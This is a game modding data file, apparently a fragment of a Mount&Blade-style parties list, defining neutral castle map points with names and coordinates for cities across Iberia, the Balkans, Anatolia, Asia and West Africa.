("valencia", "Valencia", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (234.4, -175.6), [], 225.0),
("barcelona", "Barcelona", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (205.2, -200.8), [], 225.0),
("zaragoza", "Zaragoza", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (239.16, -203.36), [], 125.0),
("cordova", "Cordova", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (282.32, -156.0), [], 25.0),
("leon", "Leon", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (289.96, -215.6), [], 35.0),
("badahose", "Badahose", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (305.4, -167.88), [], 155.0),
("burgos", "Burgos", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (269.88, -212.44), [], 55.0),
("merida", "Merida", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (297.96, -169.08), [], 10.0),
("baza", "Baza", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (261.68, -152.76), [], 35.0),
("madrid", "Madrid", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (269.64, -187.64), []),
("salamanca", "Salamanca", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (291.16, -194.44), [], 40.0),
("almagro", "Almagro", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (271.28, -167.14), [], 20.0),
("tortosa", "Tortosa", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (217.36, -197.04), [], 10.0),
("huelva", "Huelva", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (305.2, -147.84), [], 240.0),
("cuenca", "Cuenca", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (255.48, -181.88), [], 180.0),
("palma", "Palma", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (197.36, -176.92), [], 240.0),
("cieza", "Cieza", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (245.56, -163.84), [], 125.0),
("bilbao", "Bilbao", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (258.0, -223.2), [], 45.0),
("szeged", "Szeged", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (9.28, -265.56), [], 290.0),
("belgrade", "Belgrade", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (5.76, -245.56), [], 115.0),
("zagreb", "Zagreb", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (54.8, -259.2), [], 260.0),
("clujnapoca", "ClujNapoca", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-28.32, -272.72), [], 45.0),
("perek", "Perek", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-2.72, -304.4), [], 45.0),
("tuircmureci", "Tuircmureci", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-38.8, -268.8), [], 65.0),
("debrecen", "Debrecen", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-6.64, -283.44), []),
("pecs", "Pecs", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (30.52, -262.64), []),
("graz", "Graz", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (61.08, -276.8), [], 90.0),
("nis", "Nis", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-10.08, -225.64), [], 80.0),
("petro_baradin", "Petro Baradin", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (12.4, -232.2), [], 90.0),
("arad", "Arad", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-3.44, -264.0), [], 80.0),
("budapest", "Budapest", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (21.44, -283.4), [], 35.0),
("kraljevo", "Kraljevo", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-31.04, -238.92), [], 90.0),
("miskolc", "Miskolc", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (2.68, -291.2), [], 30.0),
("novi_sad", "Novi sad", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (12.8, -251.4), [], 315.0),
("lisbon", "Lisbon", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (329.12, -167.96), [], 120.0),
("coimbra", "Coimbra", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (321.2, -184.4), [], 255.0),
("braga", "Braga", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (321.2, -202.0), [], 255.0),
("faro", "Faro", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (316.4, -145.56), [], 45.0),
("porto", "Porto", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (323.44, -196.92), [], 160.0),
("evora", "Evora", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (315.4, -163.88), [], 60.0),
("braganca", "Braganca", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (301.56, -204.84), [], 260.0),
("constantinople", "Constantinople", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-86.34, -196.3), [], 90.0),
("ancyra", "Ancyra", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-129.08, -180.6), [], 45.0),
("chonai", "Chonai", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-88.0, -154.0), [], 260.0),
("adrianople", "Adrianople", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-60.8, -203.2), [], 180.0),
("marcianopolis", "Marcianopolis", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-75.04, -223.8), [], 190.0),
("bucharest", "Bucharest", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-55.56, -240.12), []),
("karaman", "Karaman", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-133.28, -147.12), []),
("sivas", "Sivas", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-175.08, -178.76), [], 275.0),
("samsun", "Samsun", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-166.8, -197.6), [], 10.0),
("manisa", "Manisa", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-70.08, -164.44), [], 90.0),
("tarnovo", "Tarnovo", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-53.88, -227.8), [], 90.0),
("baris", "Baris", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-104.4, -155.0), [], 35.0),
("thyatira", "Thyatira", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-90.04, -173.44), [], 45.0),
("gallipoli", "Gallipoli", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-60.3, -187.14), [], 45.0),
("buzau", "Buzau", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-63.52, -249.88), [], 25.0),
("iconium", "Iconium", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-125.28, -155.28), [], 145.0),
("attalia", "Attalia", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-107.2, -144.0), [], 315.0),
("angkor_thom", "Angkor Thom", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-898.8, 108.8), []),
("tuguegarao", "Tuguegarao", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1100.0, 69.2), [], 240.0),
("sukhothai", "Sukhothai", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-864.99, 88.97), [], 45.0),
("naypyidaw", "Naypyidaw", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-820.0, 46.4), [], 280.0),
("hanoi", "Hanoi", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-926.4, 34.0), [], 15.0),
("luang_namtha", "Luang namtha", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-878.08, 34.6), [], 145.0),
("kohima", "Kohima", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-798.36, -13.8), [], 15.0),
("myeik", "Myeik", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-847.64, 121.0), [], 170.0),
("hainan", "Hainan", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-969.6, 51.8), [], 110.0),
("baguio", "Baguio", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1087.6, 79.88), [], 240.0),
("danang", "Danang", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-951.6, 85.88), [], 260.0),
("thaton", "Thaton", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-834.4, 75.48), [], 55.0),
("nha_trang", "Nha trang", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-963.08, 122.52), [], 260.0),
("lashio", "Lashio", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-838.4, 13.84), [], 115.0),
("udon_thani", "Udon thani", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-893.48, 71.6), [], 25.0),
("shwebo", "Shwebo", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-815.84, 17.44), [], 25.0),
("namman", "Namman", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-877.68, -0.12), [], 115.0),
("xuchang", "Xuchang", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1014.0, -109.2), [], 290.0),
("luoyang", "Luoyang", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-999.6, -113.6), [], 90.0),
("kaifeng", "Kaifeng", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1019.16, -118.68), [], 80.0),
("puyang", "Puyang", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1027.12, -129.8), [], 125.0),
("taikang", "Taikang", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1025.12, -109.76), [], 125.0),
("jinan", "Jinan", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1050.86, -139.78), [], 115.0),
("liaocheng", "Liaocheng", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1037.32, -138.2), [], 175.0),
("yanjin", "Yanjin", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1017.8, -122.48), [], 110.0),
("heze", "Heze", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1032.04, -123.68), [], 120.0),
("pingdingshan", "Pingdingshan", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1007.36, -107.6), [], 15.0),
("zibo", "Zibo", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1059.88, -141.96), [], 45.0),
("taian", "Taian", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1049.28, -135.12), [], 90.0),
("bozhou", "Bozhou", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1037.62, -109.04), [], 65.0),
("jilin", "Jilin", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1152.8, -231.16), [], 80.0),
("mishan", "Mishan", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1201.2, -251.6), [], 45.0),
("harbin", "Harbin", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1150.82, -259.56), [], 90.0),
("siping", "Siping", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1128.56, -223.08), [], 275.0),
("yi_chun", "Yi chun", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1177.96, -286.88), [], 100.0),
("mudanjiang", "Mudanjiang", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1185.4, -241.44), [], 100.0),
("songyuan", "Songyuan", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1134.0, -250.68), [], 100.0),
("qiqihar", "Qiqihar", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1124.16, -280.92), [], 115.0),
("changchun", "Changchun", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1139.6, -232.0), []),
("hinggan", "Hinggan", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1103.96, -262.76), [], 240.0),
("onon", "Onon", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-959.6, -332.4), [], 155.0),
("merkit", "Merkit", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-894.8, -369.08), [], 45.0),
("darkhan", "Darkhan", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-927.8, -311.92), []),
("onon_ger", "Onon ger", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-941.6, -348.92), [], 110.0),
("merkit_ger", "Merkit ger", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-892.4, -327.48), [], 120.0),
("tayichiud", "Tayichiud", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1006.16, -352.39), [], 130.0),
("erdenet", "Erdenet", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-907.76, -305.64), [], 45.0),
("xining", "Xining", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-882.28, -140.32), [], 25.0),
("qingyang", "Qingyang", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-947.84, -130.44), [], 25.0),
("anding", "Anding", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-912.04, -127.56), [], 65.0),
("tianshui", "Tianshui", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-925.2, -115.2), [], 85.0),
("haixi", "Haixi", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-834.04, -149.8), [], 125.0),
("longnan", "Longnan", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-916.16, -102.0), [], 170.0),
("pingliang", "Pingliang", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-934.96, -126.36), [], 170.0),
("lanzhou", "Lanzhou", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-905.28, -133.6), [], 170.0),
("gannan", "Gannan", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-894.68, -120.92), [], 180.0),
("wuwei", "Wuwei", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-892.08, -156.1204), [], 240.0),
("aktube", "Aktube", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-394.8, -324.0), [], 270.0),
("volgograd", "Volgograd", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-258.28, -298.64), []),
("aralsk", "Aralsk", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-444.76, -274.2), [], 90.0),
("atyrau", "Atyrau", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-336.44, -279.6), [], 185.0),
("kyzylorda", "Kyzylorda", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-487.72, -246.68), [], 275.0),
("saratov", "Saratov", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-273.12, -343.56), [], 90.0),
("surabaya", "Surabaya", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1001.72, 313.44), [], 90.0),
("palembang", "Palembang", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-916.72, 267.1), [], 225.0),
("kuala_lumpur", "Kuala lumpur", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-881.24, 211.56), [], 55.0),
("davao", "Davao", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1140.96, 172.52), [], 65.0),
("pontianak", "Pontianak", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-965.12, 240.12), [], 315.0),
("makassar", "Makassar", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1075.7, 293.36), [], 225.0),
("palu", "Palu", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1079.6, 251.08), [], 155.0),
("banduang", "Banduang", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-943.2, 308.32), [], 225.0),
("banzarmasin", "Banzarmasin", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1022.98, 275.76), [], 145.0),
("medan", "Medan", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-848.0, 207.6), [], 45.0),
("kota_kinabalu", "Kota kinabalu", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1039.04, 184.56), [], 265.0),
("kurching", "Kurching", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-975.68, 227.2), [], 125.0),
("cebu", "Cebu", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1123.64, 141.82), [], 255.0),
("timbuktu", "Timbuktu", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (260.76, 76.4), [], 190.0),
("bamako", "Bamako", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (158.74, 58.24), [], 180.0),
("gao", "Gao", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (232.12, 81.74), [], 45.0),
("tamale", "Tamale", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (239.0, 150.6), [], 315.0),
("dakar", "Dakar", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (416.36, 98.6), [], 25.0),
("abidjan", "Abidjan", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (273.76, 190.32), []),
("niamey", "Niamey", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (204.96, 109.26), [], 315.0),
("djenne", "Djenne", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (277.84, 104.24), [], 125.0),
("accra", "Accra", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (232.24, 188.2), [], 270.0),
("peixian", "Peixian", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1048.8, -117.62), [], 15.0),
("jining", "Jining", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1048.52, -123.22), [], 45.0),
("tianjin", "Tianjin", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1050.8, -170.8), [], 240.0),
("weifang", "Weifang", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1072.16, -141.4), [], 240.0),
("pingyuan", "Pingyuan", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1042.2, -146.76), [], 150.0),
("linzhang", "Linzhang", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1022.08, -136.8), [], 225.0),
("hengshui", "Hengshui", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1033.8, -153.8), [], 290.0),
("shijiazhuang", "Shijiazhuang", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1021.32, -157.8), [], 315.0),
("taiyuan", "Taiyuan", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1001.58, -154.22), [], 245.0),
("qingdao", "Qingdao", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1085.2, -134.2), []),
("hekou", "Hekou", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1065.08, -155.56), [], 170.0),
("yangquan", "Yangquan", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1011.24, -155.24), [], 170.0),
("haixing", "Haixing", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1055.72, -158.8), [], 90.0),
("baoding", "Baoding", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1031.6, -168.0), [], 215.0),
("zhangbei", "Zhangbei", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1023.64, -196.84), [], 125.0),
("dezhou", "Dezhou", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1041.76, -150.32), []),
("linqing", "Linqing", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1034.56, -142.92), [], 90.0),
("yantai", "Yantai", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1096.84, -149.88), [], 180.0),
("xiangyang", "Xiangyang", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-994.8, -85.52), [], 190.0),
("wuhan", "Wuhan", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1019.26, -68.76), [], 90.0),
("xinye", "Xinye", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-997.44, -92.2), [], 60.0),
("changsha", "Changsha", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1003.76, -43.76), [], 265.0),
("changde", "Changde", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-990.2, -52.32), [], 225.0),
("jingzhou", "Jingzhou", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-995.52, -67.64), [], 155.0),
("chenzhou", "Chenzhou", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1004.72, -16.52), [], 45.0),
("zhangjiajie", "Zhangjiajie", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-976.64, -53.52), [], 180.0),
("yongzhou", "Yongzhou", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-989.68, -23.36), [], 170.0),
("hengyang", "Hengyang", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-999.92, -29.04), [], 100.0),
("zhongshan", "Zhongshan", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1009.24, 18.24), [], 170.0),
("tianmen", "Tianmen", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1006.28, -70.76), [], 10.0),
("suizhou", "Suizhou", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1009.16, -81.84), [], 260.0),
("xianning", "Xianning", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1019.0, -61.68), [], 240.0),
("shaoyang", "Shaoyang", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-987.68, -33.12), [], 45.0),
